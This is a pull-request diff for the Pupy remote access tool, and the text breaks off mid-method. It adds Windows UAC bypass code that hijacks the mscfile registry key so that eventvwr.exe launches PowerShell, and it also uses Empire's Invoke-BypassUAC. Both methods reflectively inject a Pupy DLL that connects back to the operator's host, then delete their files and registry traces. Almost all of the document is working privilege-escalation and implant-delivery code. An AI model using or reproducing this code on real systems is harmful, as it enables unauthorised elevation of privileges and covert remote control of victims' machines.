### PR TITLE
 New UAC bypass method & Outlook improvements & Rubber Ducky

### DIFF
--- a/pupy/modules/bypassuac.py
+++ b/pupy/modules/bypassuac.py
@@ -1,9 +1,10 @@
 # -*- coding: UTF8 -*-
+#by @bobsesq
 
 import os
 from pupylib.PupyModule import *
 from rpyc.utils.classic import upload
-from modules.lib.windows.bypassuac import bypassuac_through_trusted_publisher_certificate
+from modules.lib.windows.bypassuac import bypassuac_through_PowerSploitBypassUAC, bypassuac_through_EventVwrBypass
 __class_name__="BypassUAC"
 
 ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
@@ -19,6 +20,8 @@ class BypassUAC(PupyModule):
 		if self.client.desc['proc_arch'] == '32bit' and self.client.conn.modules['pupwinutils.processes'].is_x64_architecture():
 			self.error("You are using a x86 process while the os architecture is x64")
 			self.error("Migrate to a x64 process before trying to bypass UAC")
+		elif self.client.desc['release'] == '10':
+			bypassuac_through_EventVwrBypass(self, rootPupyPath=ROOT)
 		else:
 			self.success("Trying to bypass UAC...")
-			bypassuac_through_trusted_publisher_certificate(self, rootPupyPath=ROOT)
+			bypassuac_through_PowerSploitBypassUAC(self, rootPupyPath=ROOT)

--- a/pupy/modules/bypassuac.py
+++ b/pupy/modules/bypassuac.py
@@ -27,6 +27,6 @@ class BypassUAC(PupyModule):
 			bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
 			bypassUasModule.bypassuac_through_EventVwrBypass()
 		else:
-			self.success("Trying to bypass UAC with PowerSploitBypassUAC method (bypass UAC using the trusted publisher certificate through process injection), wind7-8.1 targets...")
+			self.success("Trying to bypass UAC with sysprep method (bypass UAC using the trusted publisher certificate through process injection), wind7-8.1 targets...")
 			bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
 			bypassUasModule.bypassuac_through_PowerSploitBypassUAC()

--- a/pupy/modules/bypassuac.py
+++ b/pupy/modules/bypassuac.py
@@ -4,7 +4,7 @@
 import os
 from pupylib.PupyModule import *
 from rpyc.utils.classic import upload
-from modules.lib.windows.bypassuac import bypassuac_through_PowerSploitBypassUAC, bypassuac_through_EventVwrBypass
+from modules.lib.windows.bypassuac import bypassuac
 __class_name__="BypassUAC"
 
 ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
@@ -13,15 +13,20 @@ ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
 class BypassUAC(PupyModule):
     """ try to bypass UAC with Invoke-BypassUAC.ps1, from Empire """
     dependencies=["psutil", "pupwinutils.processes"]
+    METHODS = ["eventvwr", "sysprep"]
     def init_argparse(self):
         self.arg_parser = PupyArgumentParser(prog="bypassuac", description=self.__doc__)
+        self.arg_parser.add_argument('-m', dest='method', choices=self.METHODS, default=None, help="Use a specific method. 'sysprep' can be used for wind7-8.1 (no wind10) and 'eventvwr' for wind7-10. By default, 'sysprep' for wind7-8.1 targets and 'eventvwr' for wind10. ")
 
     def run(self, args):
 		if self.client.desc['proc_arch'] == '32bit' and self.client.conn.modules['pupwinutils.processes'].is_x64_architecture():
 			self.error("You are using a x86 process while the os architecture is x64")
 			self.error("Migrate to a x64 process before trying to bypass UAC")
-		elif self.client.desc['release'] == '10':
-			bypassuac_through_EventVwrBypass(self, rootPupyPath=ROOT)
+		elif args.method == "Eventvwr" or (self.client.desc['release'] == '10' and args.method == None):
+			self.success("Trying to bypass UAC with Eventvwr method (UAC Bypass using eventvwr.exe and Registry Hijacking), wind7-10 targets...")
+			bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
+			bypassUasModule.bypassuac_through_EventVwrBypass()
 		else:
-			self.success("Trying to bypass UAC...")
-			bypassuac_through_PowerSploitBypassUAC(self, rootPupyPath=ROOT)
+			self.success("Trying to bypass UAC with PowerSploitBypassUAC method (bypass UAC using the trusted publisher certificate through process injection), wind7-8.1 targets...")
+			bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
+			bypassUasModule.bypassuac_through_PowerSploitBypassUAC()

--- a/pupy/modules/bypassuac.py
+++ b/pupy/modules/bypassuac.py
@@ -1,5 +1,6 @@
 # -*- coding: UTF8 -*-
-#by @bobsesq
+#Author: @bobsecq
+#Contributor(s):
 
 import os
 from pupylib.PupyModule import *

--- a/pupy/modules/lib/windows/bypassuac.py
+++ b/pupy/modules/lib/windows/bypassuac.py
@@ -1,4 +1,5 @@
 # -*- coding: UTF8 -*-
+#by @bobsesq
 
 import os, logging
 import platform
@@ -8,11 +9,55 @@ import base64
 from tempfile import gettempdir, _get_candidate_names
 import subprocess
 from modules.lib.windows.powershell_upload import execute_powershell_script
-import re
+import re, time
 
-def bypassuac_through_trusted_publisher_certificate(module, rootPupyPath):
+def bypassuac_through_EventVwrBypass(module, rootPupyPath):
 	'''
-	Performs a bypass UAC attack by utilizing the trusted publisher certificate through process injection. 
+	Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
+	'''
+	#Constants
+	mscCmdPath = "Software\Classes\mscfile\shell\open\command"
+	#Define Remote paths
+	remoteTempFolder=module.client.conn.modules['os.path'].expandvars("%TEMP%")
+	invokeReflectivePEInjectionRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.txt')
+	mainPowershellScriptRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.ps1')
+	pupyDLLRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.txt')
+	eventvwrPath = module.client.conn.modules['os.path'].join(module.client.conn.modules['os'].environ['WINDIR'],'System32','eventvwr.exe')
+	#Define Local paths
+	pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt')
+	mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt')
+	invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1")
+	#Variables
+	HKCU = module.client.conn.modules['_winreg'].HKEY_CURRENT_USER
+	cmd = "PowerShell.exe -ExecutionPolicy Bypass -File {0}".format(mainPowershellScriptRemotePath)
+	#main
+	uploadPupyDLL(module, pupyDLLLocalPath, pupyDLLRemotePath)
+	uploadPowershellScripts(module, mainPowerShellScriptPrivilegedLocalPath, mainPowershellScriptRemotePath, invokeReflectivePEInjectionLocalPath, invokeReflectivePEInjectionRemotePath, pupyDLLRemotePath)
+	try:
+		key = module.client.conn.modules['_winreg'].OpenKey(HKCU, mscCmdPath, module.client.conn.modules['_winreg'].KEY_SET_VALUE)
+		logging.debug('The registry key {0} already exist in HKCU, altering...'.format(mscCmdPath))
+	except:
+		logging.debug("Adding the registry key {0} in HKCU".format(mscCmdPath))
+		key = module.client.conn.modules['_winreg'].CreateKey(HKCU, mscCmdPath)
+	registry_key = module.client.conn.modules['_winreg'].OpenKey(HKCU, mscCmdPath, 0, module.client.conn.modules['_winreg'].KEY_WRITE)
+	module.client.conn.modules['_winreg'].SetValueEx(key, '', 0, module.client.conn.modules['_winreg'].REG_SZ, cmd)
+	module.client.conn.modules['_winreg'].CloseKey(registry_key)
+		
+	logging.debug('Executing {0} through eventvwr.exe'.format(eventvwrPath))
+	output = module.client.conn.modules.subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
+	logging.debug("Output: {0}".format(repr(output)))
+	logging.debug("Sleeping 5 secds...")
+	time.sleep(5)
+	logging.debug("Deleting registry key {0} from HKCU".format(mscCmdPath))
+	module.client.conn.modules['_winreg'].DeleteKey(HKCU, mscCmdPath)
+	#Clean
+	deleteTHisRemoteFile(module, invokeReflectivePEInjectionRemotePath)
+	deleteTHisRemoteFile(module, mainPowershellScriptRemotePath)
+	deleteTHisRemoteFile(module, pupyDLLRemotePath)
+
+def bypassuac_through_PowerSploitBypassUAC(module, rootPupyPath):
+	'''
+	Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1)
 	'''
 	module.client.load_package("psutil")
 	module.client.load_package("pupwinutils.processes")
@@ -23,15 +68,39 @@ def bypassuac_through_trusted_publisher_certificate(module, rootPupyPath):
 	mainPowershellScriptRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.ps1')
 	pupyDLLRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.txt')
 	#Define Local paths
+	pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt')
 	mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt')
 	invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
 	invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1")
 	invokeBypassUACLocalPath = os.path.join(rootPupyPath,"pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
-	pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt')
 	#Constants
 	bypassUACcmd = "Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass -file {0} -Verbose'".format(mainPowershellScriptRemotePath) #{0}=mainPowerShellScriptPrivileged.ps1
 	byPassUACSuccessString = "DLL injection complete!"
-	#main powershell script executed by bypassuac powershell script
+	
+	uploadPowershellScripts(module, mainPowerShellScriptPrivilegedLocalPath, mainPowershellScriptRemotePath, invokeReflectivePEInjectionLocalPath, invokeReflectivePEInjectionRemotePath, pupyDLLRemotePath)
+
+	uploadPupyDLL(module, pupyDLLLocalPath,pupyDLLRemotePath)
+	
+	content = re.sub("Write-Verbose ","Write-Output ", open(invokeBypassUACLocalPath, 'r').read(), flags=re.I)
+	logging.info("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd))
+ 	output = execute_powershell_script(module, content, bypassUACcmd)
+	logging.info("BypassUAC script output: %s\n"%(output))
+	if byPassUACSuccessString in output:
+		module.success("UAC bypassed")
+	else:
+		module.warning("Impossible to know what's happened remotely. You should active debug mode.")
+	#Clean
+	deleteTHisRemoteFile(module, invokeReflectivePEInjectionRemotePath)
+	deleteTHisRemoteFile(module, mainPowershellScriptRemotePath)
+	deleteTHisRemoteFile(module, invokeBypassUACRemotePath)
+	deleteTHisRemoteFile(module, pupyDLLRemotePath)
+	#...
+	module.success("Waiting for a connection from the DLL (take few seconds)...")
+	
+def uploadPowershellScripts(module, mainPowerShellScriptPrivilegedLocalPath, mainPowershellScriptRemotePath, invokeReflectivePEInjectionLocalPath, invokeReflectivePEInjectionRemotePath, pupyDLLRemotePath):
+	'''
+	Upload main powershell script and invokeReflectivePEInjection script
+	'''
 	mainPowerShellScriptPrivileged = """
 	cat {0} | Out-String  | iex
 	cat {1} | Out-String  | iex
@@ -42,10 +111,13 @@ def bypassuac_through_trusted_publisher_certificate(module, rootPupyPath):
 		w.write(mainPowerShellScriptPrivileged.format(invokeReflectivePEInjectionRemotePath, pupyDLLRemotePath))
 	logging.info("Uploading powershell code for DLL injection in {0}".format(invokeReflectivePEInjectionRemotePath))
 	upload(module.client.conn, invokeReflectivePEInjectionLocalPath, invokeReflectivePEInjectionRemotePath)
-	#logging.info("Uploading powershell code for UAC Bypass in {0}".format())
-	#upload(module.client.conn, invokeBypassUACLocalPath, invokeBypassUACRemotePath)
 	logging.info("Uploading main powershell script executed by BypassUAC in {0}".format(mainPowerShellScriptPrivilegedLocalPath))
 	upload(module.client.conn, mainPowerShellScriptPrivilegedLocalPath, mainPowershellScriptRemotePath)
+
+def uploadPupyDLL(module, pupyDLLLocalPath, pupyDLLRemotePath):
+	'''
+	Returns True if no error. Otherwise returns False
+	'''
 	res=module.client.conn.modules['pupy'].get_connect_back_host()
 	host, port = res.rsplit(':',1)
 	logging.info("Address configured is %s:%s for pupy dll..."%(host,port))
@@ -58,27 +130,19 @@ def bypassuac_through_trusted_publisher_certificate(module, rootPupyPath):
 		dllbuff=pupygen.get_edit_pupyx86_dll(module.client.get_conf())
 	else:
 		module.error("Target architecture is unknown (!= x86 or x64), abording...")
-		return 
+		return False
 	logging.info("Creating the pupy dll in %s locally"%(pupyDLLLocalPath))
 	with open(pupyDLLLocalPath, 'w+') as w:
 		w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff)))
 	logging.info("Uploading pupy dll in {0}".format(pupyDLLRemotePath))
 	upload(module.client.conn, pupyDLLLocalPath, pupyDLLRemotePath)
-	content = re.sub("Write-Verbose ","Write-Output ", open(invokeBypassUACLocalPath, 'r').read(), flags=re.I)
-	logging.info("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd))
- 	output = execute_powershell_script(module, content, bypassUACcmd)
-	logging.info("BypassUAC script output: %s\n"%(output))
-	if byPassUACSuccessString in output:
-		module.success("UAC bypassed")
-	else:
-		module.warning("Impossible to know what's happened remotely. You should active debug mode.")
-	for aFile in [invokeReflectivePEInjectionRemotePath, invokeBypassUACRemotePath, mainPowershellScriptRemotePath, pupyDLLRemotePath]:
-		logging.info("Deleting remote file {0}".format(aFile))
-		output = module.client.conn.modules.subprocess.check_output("DEL /F /Q \"{0}\"".format(aFile), stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
-		logging.debug("Delete Status: {0}".format(repr(output)))
-	module.success("Waiting for a connection from the DLL (take few seconds)...")
+	return True
 
-
-
-
-
+def deleteTHisRemoteFile(module, remotePath):
+	'''
+	'''
+	logging.debug("Deleting the remote file {0}".format(remotePath))
+	try:
+		module.client.conn.modules['os'].remove(remotePath)
+	except Exception, e:
+		logging.warning('Impossible to delete remote file {0}: {1}'.format(remotePath, repr(e)))

--- a/pupy/modules/lib/windows/bypassuac.py
+++ b/pupy/modules/lib/windows/bypassuac.py
@@ -1,5 +1,6 @@
 # -*- coding: UTF8 -*-
-#by @bobsesq
+#Author: @bobsecq
+#Contributor(s):
 
 import os, logging
 import platform

--- a/pupy/modules/lib/windows/bypassuac.py
+++ b/pupy/modules/lib/windows/bypassuac.py
@@ -11,138 +11,140 @@ import subprocess
 from modules.lib.windows.powershell_upload import execute_powershell_script
 import re, time
 
-def bypassuac_through_EventVwrBypass(module, rootPupyPath):
+class bypassuac():
 	'''
-	Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
 	'''
-	#Constants
-	mscCmdPath = "Software\Classes\mscfile\shell\open\command"
-	#Define Remote paths
-	remoteTempFolder=module.client.conn.modules['os.path'].expandvars("%TEMP%")
-	invokeReflectivePEInjectionRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.txt')
-	mainPowershellScriptRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.ps1')
-	pupyDLLRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.txt')
-	eventvwrPath = module.client.conn.modules['os.path'].join(module.client.conn.modules['os'].environ['WINDIR'],'System32','eventvwr.exe')
-	#Define Local paths
-	pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt')
-	mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt')
-	invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1")
-	#Variables
-	HKCU = module.client.conn.modules['_winreg'].HKEY_CURRENT_USER
-	cmd = "PowerShell.exe -ExecutionPolicy Bypass -File {0}".format(mainPowershellScriptRemotePath)
-	#main
-	uploadPupyDLL(module, pupyDLLLocalPath, pupyDLLRemotePath)
-	uploadPowershellScripts(module, mainPowerShellScriptPrivilegedLocalPath, mainPowershellScriptRemotePath, invokeReflectivePEInjectionLocalPath, invokeReflectivePEInjectionRemotePath, pupyDLLRemotePath)
-	try:
-		key = module.client.conn.modules['_winreg'].OpenKey(HKCU, mscCmdPath, module.client.conn.modules['_winreg'].KEY_SET_VALUE)
-		logging.debug('The registry key {0} already exist in HKCU, altering...'.format(mscCmdPath))
-	except:
-		logging.debug("Adding the registry key {0} in HKCU".format(mscCmdPath))
-		key = module.client.conn.modules['_winreg'].CreateKey(HKCU, mscCmdPath)
-	registry_key = module.client.conn.modules['_winreg'].OpenKey(HKCU, mscCmdPath, 0, module.client.conn.modules['_winreg'].KEY_WRITE)
-	module.client.conn.modules['_winreg'].SetValueEx(key, '', 0, module.client.conn.modules['_winreg'].REG_SZ, cmd)
-	module.client.conn.modules['_winreg'].CloseKey(registry_key)
+	
+	def __init__(self, module, rootPupyPath):
+		'''
+		'''
+		self.module = module
+		self.rootPupyPath = rootPupyPath
+		#Constants
+		self.x86PowershellPath = "syswow64\WindowsPowerShell\\v1.0\\powershell.exe"
+		self.x64PowershellPath = "system32\\WindowsPowerShell\\v1.0\\powershell.exe"
+		#Remote paths
+		self.remoteTempFolder=self.module.client.conn.modules['os.path'].expandvars("%TEMP%")
+		self.systemRoot = self.module.client.conn.modules['os.path'].expandvars("%SYSTEMROOT%")
+		self.invokeReflectivePEInjectionRemotePath = "{0}.{1}".format(self.module.client.conn.modules['os.path'].join(self.remoteTempFolder, next(_get_candidate_names())), '.txt')
+		self.mainPowershellScriptRemotePath = "{0}.{1}".format(self.module.client.conn.modules['os.path'].join(self.remoteTempFolder, next(_get_candidate_names())), '.ps1')
+		self.pupyDLLRemotePath = "{0}.{1}".format(self.module.client.conn.modules['os.path'].join(self.remoteTempFolder, next(_get_candidate_names())), '.txt')
+		self.invokeBypassUACRemotePath = "{0}.{1}".format(self.module.client.conn.modules['os.path'].join(self.remoteTempFolder, next(_get_candidate_names())), '.ps1')
+		#Define Local paths
+		self.pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt')
+		self.mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt')
+		self.invokeReflectivePEInjectionLocalPath = os.path.join(self.rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1")
+		self.invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
+		#Others
+		self.HKCU = self.module.client.conn.modules['_winreg'].HKEY_CURRENT_USER
+		if "64" in self.module.client.desc['proc_arch']: self.powershellPath = self.module.client.conn.modules['os.path'].join(self.systemRoot, self.x64PowershellPath)
+		else: powershellPath = self.module.client.conn.modules['os.path'].join(self.systemRoot, self.x86PowershellPath)
 		
-	logging.debug('Executing {0} through eventvwr.exe'.format(eventvwrPath))
-	output = module.client.conn.modules.subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
-	logging.debug("Output: {0}".format(repr(output)))
-	logging.debug("Sleeping 5 secds...")
-	time.sleep(5)
-	logging.debug("Deleting registry key {0} from HKCU".format(mscCmdPath))
-	module.client.conn.modules['_winreg'].DeleteKey(HKCU, mscCmdPath)
-	#Clean
-	deleteTHisRemoteFile(module, invokeReflectivePEInjectionRemotePath)
-	deleteTHisRemoteFile(module, mainPowershellScriptRemotePath)
-	deleteTHisRemoteFile(module, pupyDLLRemotePath)
+	def bypassuac_through_EventVwrBypass(self):
+		'''
+		Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
+		'''
+		#Constants
+		mscCmdPath = "Software\Classes\mscfile\shell\open\command"
+		eventvwrPath = self.module.client.conn.modules['os.path'].join(self.module.client.conn.modules['os'].environ['WINDIR'],'System32','eventvwr.exe')
+		cmd = "{1} -ExecutionPolicy Bypass -File {0}".format(self.mainPowershellScriptRemotePath, self.powershellPath)
+		#main
+		self.uploadPupyDLL()
+		self.uploadPowershellScripts()
+		try:
+			key = self.module.client.conn.modules['_winreg'].OpenKey(self.HKCU, mscCmdPath, self.module.client.conn.modules['_winreg'].KEY_SET_VALUE)
+			logging.debug('The registry key {0} already exist in HKCU, altering...'.format(mscCmdPath))
+		except:
+			logging.debug("Adding the registry key {0} in HKCU".format(mscCmdPath))
+			key = self.module.client.conn.modules['_winreg'].CreateKey(self.HKCU, mscCmdPath)
+		registry_key = self.module.client.conn.modules['_winreg'].OpenKey(self.HKCU, mscCmdPath, 0, self.module.client.conn.modules['_winreg'].KEY_WRITE)
+		self.module.client.conn.modules['_winreg'].SetValueEx(registry_key, '', 0, self.module.client.conn.modules['_winreg'].REG_SZ, cmd)
+		self.module.client.conn.modules['_winreg'].CloseKey(registry_key)
+			
+		logging.debug('Executing {0} through eventvwr.exe'.format(eventvwrPath))
+		output = self.module.client.conn.modules.subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
+		logging.debug("Output: {0}".format(repr(output)))
+		logging.debug("Sleeping 5 secds...")
+		time.sleep(5)
+		logging.debug("Deleting registry key {0} from HKCU".format(mscCmdPath))
+		self.module.client.conn.modules['_winreg'].DeleteKey(self.HKCU, mscCmdPath)
+		#Clean
+		self.deleteTHisRemoteFile(self.invokeReflectivePEInjectionRemotePath)
+		self.deleteTHisRemoteFile(self.mainPowershellScriptRemotePath)
+		self.deleteTHisRemoteFile(self.pupyDLLRemotePath)
+		self.module.success("Waiting for a connection from the DLL (take few seconds)...")
+		
+	def bypassuac_through_PowerSploitBypassUAC(self):
+		'''
+		Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1)
+		'''
+		#Constants
+		bypassUACcmd = "Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass -file {0} -Verbose'".format(self.mainPowershellScriptRemotePath) #{0}=mainPowerShellScriptPrivileged.ps1
+		byPassUACSuccessString = "DLL injection complete!"
+		self.uploadPowershellScripts()
+		self.uploadPupyDLL()
+		content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I)
+		logging.info("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd))
+		output = execute_powershell_script(self.module, content, bypassUACcmd)
+		logging.info("BypassUAC script output: %s\n"%(output))
+		if byPassUACSuccessString in output:
+			self.module.success("UAC bypassed")
+		else:
+			self.module.warning("Impossible to know what's happened remotely. You should active debug mode.")
+		#Clean
+		self.deleteTHisRemoteFile(self.invokeReflectivePEInjectionRemotePath)
+		self.deleteTHisRemoteFile(self.mainPowershellScriptRemotePath)
+		self.deleteTHisRemoteFile(self.invokeBypassUACRemotePath)
+		self.deleteTHisRemoteFile(self.pupyDLLRemotePath)
+		#...
+		self.module.success("Waiting for a connection from the DLL (take few seconds)...")
+		
+	def uploadPowershellScripts(self):
+		'''
+		Upload main powershell script and invokeReflectivePEInjection script
+		'''
+		mainPowerShellScriptPrivileged = """
+		cat {0} | Out-String  | iex
+		cat {1} | Out-String  | iex
+		Invoke-ReflectivePEInjection -PEBytes $PEBytes -ForceASLR
+		""" #{0}=Invoke-ReflectivePEInjection.txt and {1}=dllFile.txt
+		logging.info("Creating the Powershell script in %s locally"%(self.mainPowerShellScriptPrivilegedLocalPath))
+		with open(self.mainPowerShellScriptPrivilegedLocalPath, 'w+') as w:
+			w.write(mainPowerShellScriptPrivileged.format(self.invokeReflectivePEInjectionRemotePath, self.pupyDLLRemotePath))
+		logging.info("Uploading powershell code for DLL injection in {0}".format(self.invokeReflectivePEInjectionRemotePath))
+		upload(self.module.client.conn, self.invokeReflectivePEInjectionLocalPath, self.invokeReflectivePEInjectionRemotePath)
+		logging.info("Uploading main powershell script executed by BypassUAC in {0}".format(self.mainPowershellScriptRemotePath))
+		upload(self.module.client.conn, self.mainPowerShellScriptPrivilegedLocalPath, self.mainPowershellScriptRemotePath)
 
-def bypassuac_through_PowerSploitBypassUAC(module, rootPupyPath):
-	'''
-	Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1)
-	'''
-	module.client.load_package("psutil")
-	module.client.load_package("pupwinutils.processes")
-	#Define Remote paths
-	remoteTempFolder=module.client.conn.modules['os.path'].expandvars("%TEMP%")
-	invokeReflectivePEInjectionRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.txt')
-	invokeBypassUACRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.ps1')
-	mainPowershellScriptRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.ps1')
-	pupyDLLRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.txt')
-	#Define Local paths
-	pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt')
-	mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt')
-	invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
-	invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1")
-	invokeBypassUACLocalPath = os.path.join(rootPupyPath,"pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
-	#Constants
-	bypassUACcmd = "Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass -file {0} -Verbose'".format(mainPowershellScriptRemotePath) #{0}=mainPowerShellScriptPrivileged.ps1
-	byPassUACSuccessString = "DLL injection complete!"
-	
-	uploadPowershellScripts(module, mainPowerShellScriptPrivilegedLocalPath, mainPowershellScriptRemotePath, invokeReflectivePEInjectionLocalPath, invokeReflectivePEInjectionRemotePath, pupyDLLRemotePath)
-
-	uploadPupyDLL(module, pupyDLLLocalPath,pupyDLLRemotePath)
-	
-	content = re.sub("Write-Verbose ","Write-Output ", open(invokeBypassUACLocalPath, 'r').read(), flags=re.I)
-	logging.info("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd))
- 	output = execute_powershell_script(module, content, bypassUACcmd)
-	logging.info("BypassUAC script output: %s\n"%(output))
-	if byPassUACSuccessString in output:
-		module.success("UAC bypassed")
-	else:
-		module.warning("Impossible to know what's happened remotely. You should active debug mode.")
-	#Clean
-	deleteTHisRemoteFile(module, invokeReflectivePEInjectionRemotePath)
-	deleteTHisRemoteFile(module, mainPowershellScriptRemotePath)
-	deleteTHisRemoteFile(module, invokeBypassUACRemotePath)
-	deleteTHisRemoteFile(module, pupyDLLRemotePath)
-	#...
-	module.success("Waiting for a connection from the DLL (take few seconds)...")
-	
-def uploadPowershellScripts(module, mainPowerShellScriptPrivilegedLocalPath, mainPowershellScriptRemotePath, invokeReflectivePEInjectionLocalPath, invokeReflectivePEInjectionRemotePath, pupyDLLRemotePath):
-	'''
-	Upload main powershell script and invokeReflectivePEInjection script
-	'''
-	mainPowerShellScriptPrivileged = """
-	cat {0} | Out-String  | iex
-	cat {1} | Out-String  | iex
-	Invoke-ReflectivePEInjection -PEBytes $PEBytes -ForceASLR
-	""" #{0}=Invoke-ReflectivePEInjection.txt and {1}=dllFile.txt
-	logging.info("Creating the Powershell script in %s locally"%(mainPowerShellScriptPrivilegedLocalPath))
-	with open(mainPowerShellScriptPrivilegedLocalPath, 'w+') as w:
-		w.write(mainPowerShellScriptPrivileged.format(invokeReflectivePEInjectionRemotePath, pupyDLLRemotePath))
-	logging.info("Uploading powershell code for DLL injection in {0}".format(invokeReflectivePEInjectionRemotePath))
-	upload(module.client.conn, invokeReflectivePEInjectionLocalPath, invokeReflectivePEInjectionRemotePath)
-	logging.info("Uploading main powershell script executed by BypassUAC in {0}".format(mainPowerShellScriptPrivilegedLocalPath))
-	upload(module.client.conn, mainPowerShellScriptPrivilegedLocalPath, mainPowershellScriptRemotePath)
-
-def uploadPupyDLL(module, pupyDLLLocalPath, pupyDLLRemotePath):
-	'''
-	Returns True if no error. Otherwise returns False
-	'''
-	res=module.client.conn.modules['pupy'].get_connect_back_host()
-	host, port = res.rsplit(':',1)
-	logging.info("Address configured is %s:%s for pupy dll..."%(host,port))
-	logging.info("Looking for process architecture...")
-	if module.client.conn.modules['pupwinutils.processes'].is_x64_architecture() == True:
-		logging.info("Target achitecture is x64, using a x64 dll")
-		dllbuff=pupygen.get_edit_pupyx64_dll(module.client.get_conf())
-	elif module.client.conn.modules['pupwinutils.processes'].is_x86_architecture() == True:
-		logging.info("Target achitecture is x86, using a x86 dll")
-		dllbuff=pupygen.get_edit_pupyx86_dll(module.client.get_conf())
-	else:
-		module.error("Target architecture is unknown (!= x86 or x64), abording...")
-		return False
-	logging.info("Creating the pupy dll in %s locally"%(pupyDLLLocalPath))
-	with open(pupyDLLLocalPath, 'w+') as w:
-		w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff)))
-	logging.info("Uploading pupy dll in {0}".format(pupyDLLRemotePath))
-	upload(module.client.conn, pupyDLLLocalPath, pupyDLLRemotePath)
-	return True
-
-def deleteTHisRemoteFile(module, remotePath):
-	'''
-	'''
-	logging.debug("Deleting the remote file {0}".format(remotePath))
-	try:
-		module.client.conn.modules['os'].remove(remotePath)
-	except Exception, e:
-		logging.warning('Impossible to delete remote file {0}: {1}'.format(remotePath, repr(e)))
+	def uploadPupyDLL(self):
+		'''
